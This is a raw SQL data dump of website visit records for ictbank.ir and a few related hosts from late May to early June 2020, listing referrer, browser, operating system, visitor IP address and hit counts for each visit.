(2626,'2020-05-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.144.18','000',0,1,0),
(2627,'2020-05-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,2,0),
(2628,'2020-05-22','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','176.122.120.210','000',0,1,0),
(2629,'2020-05-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2630,'2020-05-22','http://ictbank.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','123.115.72.162','000',0,1,0),
(2631,'2020-05-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.123','000',0,6,0),
(2632,'2020-05-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.1.12','000',0,1,0),
(2633,'2020-05-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.70.141','000',0,2,0),
(2634,'2020-05-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.36.229','000',0,1,0),
(2635,'2020-05-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.49.213','000',0,1,0),
(2636,'2020-05-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.220.236','000',0,1,0),
(2637,'2020-05-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2638,'2020-05-24','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','138.197.199.179','000',0,1,0),
(2639,'2020-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.238.188','000',0,1,0),
(2640,'2020-05-24','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.242','000',0,1,0),
(2641,'2020-05-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2642,'2020-05-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2643,'2020-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.136.39','000',0,1,0),
(2644,'2020-05-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2645,'2020-05-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,5,0),
(2646,'2020-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.196.110','000',0,1,0),
(2647,'2020-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.219.212','000',0,1,0),
(2648,'2020-05-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(2649,'2020-05-24','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','37.192.96.160','000',0,1,0),
(2650,'2020-05-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','13.113.106.158','000',0,1,0),
(2651,'2020-05-25','http://ictbank.ir/blog','Chrome','OS X','10.15.3',NULL,NULL,'','14.106.107.243','000',0,1,0),
(2652,'2020-05-25','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','103.43.160.196','000',0,1,0),
(2653,'2020-05-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','35.166.68.96','000',0,1,0),
(2654,'2020-05-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.130','000',0,6,0),
(2655,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.22.243.121','000',0,1,0),
(2656,'2020-05-25','http://ictbank.ir/blog','Chrome','Ubuntu','Unknown',NULL,NULL,'','37.192.147.114','000',0,1,0),
(2657,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.88.224','000',0,1,0),
(2658,'2020-05-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.17','000',0,1,0),
(2659,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.19.239','000',0,1,0),
(2660,'2020-05-25','http://ictbank.ir/blog','Chrome','OS X','10.15.3',NULL,NULL,'','18.204.70.192','000',0,1,0),
(2661,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.239.16','000',0,1,0),
(2662,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.235.37','000',0,1,0),
(2663,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.203.139','000',0,1,0),
(2664,'2020-05-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','44.234.62.131','000',0,1,0),
(2665,'2020-05-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.213.235.228','000',0,1,0),
(2666,'2020-05-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2667,'2020-05-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2668,'2020-05-25','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','139.59.67.152','000',0,1,0),
(2669,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','138.197.148.246','000',0,2,0),
(2670,'2020-05-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','159.203.24.107','000',0,1,0),
(2671,'2020-05-26','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(2672,'2020-05-26','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.74.66','000',0,1,0),
(2673,'2020-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.230.215','000',0,1,0),
(2674,'2020-05-26','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','134.175.110.184','000',0,3,0),
(2675,'2020-05-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.130','000',0,6,0),
(2676,'2020-05-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','37.192.147.114','000',0,1,0),
(2677,'2020-05-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','144.76.25.220','000',0,1,0),
(2678,'2020-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.190.24','000',0,1,0),
(2679,'2020-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.15.198.78','000',0,1,0),
(2680,'2020-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.136.181','000',0,1,0),
(2681,'2020-05-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.234.219.133','000',0,1,0),
(2682,'2020-05-26','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','149.202.72.195','000',0,1,0),
(2683,'2020-05-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(2684,'2020-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.52.79','000',0,1,0),
(2685,'2020-05-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(2686,'2020-05-26','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','51.255.43.81','000',0,2,0),
(2687,'2020-05-26','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','62.141.37.177','000',0,1,0),
(2688,'2020-05-26','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','167.71.184.87','000',0,1,0),
(2689,'2020-05-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(2690,'2020-05-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','203.176.86.99','000',0,3,0),
(2691,'2020-05-27','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','128.199.194.131','000',0,2,0),
(2692,'2020-05-27','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','54.36.246.232','000',0,1,0),
(2693,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.137.44','000',0,1,0),
(2694,'2020-05-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.130','000',0,6,0),
(2695,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.72.108','000',0,1,0),
(2696,'2020-05-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,5,0),
(2697,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.146.122.226','000',0,2,0),
(2698,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','159.65.24.22','000',0,1,0),
(2699,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.126.109','000',0,1,0),
(2700,'2020-05-27','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.158.121.89','000',0,1,0),
(2701,'2020-05-27','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.90.58.63','000',0,1,0),
(2702,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.242.107.237','000',0,1,0),
(2703,'2020-05-27','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2704,'2020-05-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.116','000',0,1,0),
(2705,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.194.59','000',0,1,0),
(2706,'2020-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.46.40','000',0,1,0),
(2707,'2020-05-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2708,'2020-05-27','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,2,0),
(2709,'2020-05-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,7,0),
(2710,'2020-05-28','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(2711,'2020-05-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(2712,'2020-05-28','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.83.78','000',0,1,0),
(2713,'2020-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.50.19','000',0,1,0),
(2714,'2020-05-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.130','000',0,6,0),
(2715,'2020-05-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','156.203.135.105','000',0,2,0),
(2716,'2020-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.191.126','000',0,1,0),
(2717,'2020-05-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','175.6.40.66','000',0,1,0),
(2718,'2020-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.232.231','000',0,1,0),
(2719,'2020-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.182.216','000',0,1,0),
(2720,'2020-05-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2721,'2020-05-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(2722,'2020-05-28','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','176.9.23.3','000',0,1,0),
(2723,'2020-05-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.247','000',0,1,0),
(2724,'2020-05-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.204.106.181','000',0,2,0),
(2725,'2020-05-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.232.175.152','000',0,3,0),
(2726,'2020-05-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,2,0),
(2727,'2020-05-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(2728,'2020-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.20.218','000',0,1,0),
(2729,'2020-05-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2730,'2020-05-29','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','199.30.228.131','000',0,1,0),
(2731,'2020-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.101.136','000',0,1,0),
(2732,'2020-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.236.108','000',0,1,0),
(2733,'2020-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.79.34','000',0,1,0),
(2734,'2020-05-29','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','192.99.36.177','000',0,1,0),
(2735,'2020-05-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.70.73.242','000',0,1,0),
(2736,'2020-05-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2737,'2020-05-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(2738,'2020-05-29','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','37.192.96.160','000',0,1,0),
(2739,'2020-05-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.220.149.31','000',0,1,0),
(2740,'2020-05-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.130','000',0,6,0),
(2741,'2020-05-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(2742,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.23.21.240','000',0,1,0),
(2743,'2020-05-30','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','171.34.178.110','000',0,1,0),
(2744,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.188.104','000',0,1,0),
(2745,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.219.146','000',0,1,0),
(2746,'2020-05-30','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','183.204.4.18','000',0,3,0),
(2747,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.239.36','000',0,1,0),
(2748,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','95.217.176.26','000',0,1,0),
(2749,'2020-05-30','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.40.191.116','000',0,3,0),
(2750,'2020-05-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(2751,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.156.73','000',0,1,0),
(2752,'2020-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.130.29','000',0,1,0),
(2753,'2020-05-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2754,'2020-05-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.130','000',0,3,0),
(2755,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.229.103','000',0,1,0),
(2756,'2020-05-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2757,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.147','000',0,1,0),
(2758,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.51.21','000',0,1,0),
(2759,'2020-05-31','https://builtwith.com','Chrome','Windows','10.0',NULL,NULL,'','3.226.237.162','000',0,1,0),
(2760,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','222.82.48.50','000',0,1,0),
(2761,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','144.217.99.65','000',0,51,0),
(2762,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.119.29','000',0,1,0),
(2763,'2020-05-31','http://82.102.9.14:80','Internet Explorer','Windows','6.1',NULL,NULL,'','139.213.117.90','000',0,1,0),
(2764,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.218.188','000',0,1,0),
(2765,'2020-05-31','http://ictbank.ir/blog','LG Browser','Android','5.0.2',NULL,NULL,'','195.146.37.19','000',0,1,0),
(2766,'2020-05-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2767,'2020-05-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','18.221.228.119','000',0,32,0),
(2768,'2020-05-31','http://ictbank.ir/blog','Firefox','OS X','10.13',NULL,NULL,'','163.172.164.87','000',0,1,0),
(2769,'2020-05-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2770,'2020-06-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(2771,'2020-06-01','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','207.180.255.81','000',0,2,0),
(2772,'2020-06-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2773,'2020-06-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(2774,'2020-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.234.86','000',0,1,0),
(2775,'2020-06-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2776,'2020-06-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','95.217.186.175','000',0,1,0),
(2777,'2020-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.0.101','000',0,1,0),
(2778,'2020-06-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2779,'2020-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.193.70','000',0,1,0),
(2780,'2020-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.232.164','000',0,1,0),
(2781,'2020-06-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2782,'2020-06-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(2783,'2020-06-02','http://ictbank.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','35.228.212.136','000',0,6,0),
(2784,'2020-06-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(2785,'2020-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.130.55','000',0,1,0),
(2786,'2020-06-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(2787,'2020-06-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','104.168.44.142','000',0,3,0),
(2788,'2020-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.158.60','000',0,1,0),
(2789,'2020-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.51.15','000',0,1,0),
(2790,'2020-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.211.81','000',0,1,0),
(2791,'2020-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.166.51.23','000',0,2,0),
(2792,'2020-06-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2793,'2020-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.123.233.26','000',0,1,0),
(2794,'2020-06-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.150.242','000',0,1,0),
(2795,'2020-06-03','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','165.22.205.40','000',0,1,0),
(2796,'2020-06-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(2797,'2020-06-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2798,'2020-06-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','183.204.4.18','000',0,3,0),
(2799,'2020-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.60.226','000',0,1,0),
(2800,'2020-06-03','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','159.203.93.122','000',0,1,0),
(2801,'2020-06-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2802,'2020-06-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2803,'2020-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.28.219','000',0,1,0),
(2804,'2020-06-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','108.178.61.58','000',0,1,0),
(2805,'2020-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.202.222','000',0,1,0),
(2806,'2020-06-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','180.76.154.165','000',0,2,0),
(2807,'2020-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.253.93','000',0,1,0),
(2808,'2020-06-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2809,'2020-06-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.226.252','000',0,1,0),
(2810,'2020-06-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(2811,'2020-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.85.233','000',0,1,0),
(2812,'2020-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.84.178','000',0,1,0),
(2813,'2020-06-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(2814,'2020-06-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2815,'2020-06-04','http://ictbank.ir/blog','Chrome','Ubuntu','Unknown',NULL,NULL,'','90.154.102.15','000',0,1,0),
(2816,'2020-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.70.163','000',0,1,0),
(2817,'2020-06-04','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(2818,'2020-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.197.115','000',0,1,0),
(2819,'2020-06-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(2820,'2020-06-04','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(2821,'2020-06-04','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(2822,'2020-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.3.128','000',0,1,0),
(2823,'2020-06-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2824,'2020-06-04','android-app://org.telegram.plus/','Chrome','Android','8.0.0',NULL,NULL,'','178.62.80.126','000',0,3,0),
(2825,'2020-06-04','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','195.146.37.19','000',0,1,0),
(2826,'2020-06-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.46.45','000',0,1,0),
(2827,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(2828,'2020-06-05','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','37.192.120.228','000',0,4,0),
(2829,'2020-06-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(2830,'2020-06-05','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','46.45.185.167','000',0,1,0),
(2831,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.153.10','000',0,1,0),
(2832,'2020-06-05','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','47.95.239.170','000',0,1,0),
(2833,'2020-06-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2834,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.253.115.183','000',0,1,0),
(2835,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.43.219','000',0,1,0),
(2836,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.162','000',0,2,0),
(2837,'2020-06-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(2838,'2020-06-05','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,1,0),
(2839,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.26.58.177','000',0,1,0),
(2840,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.209.22','000',0,1,0),
(2841,'2020-06-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','68.235.33.178','000',0,1,0),
(2842,'2020-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.222.133','000',0,1,0),
(2843,'2020-06-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2844,'2020-06-05','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','95.140.203.217','000',0,2,0),
(2845,'2020-06-06','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2846,'2020-06-06','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(2847,'2020-06-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2848,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.223.183','000',0,1,0),
(2849,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','78.46.85.253','000',0,1,0),
(2850,'2020-06-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','192.227.144.226','000',0,1,0),
(2851,'2020-06-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2852,'2020-06-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,4,0),
(2853,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.170.22','000',0,1,0),
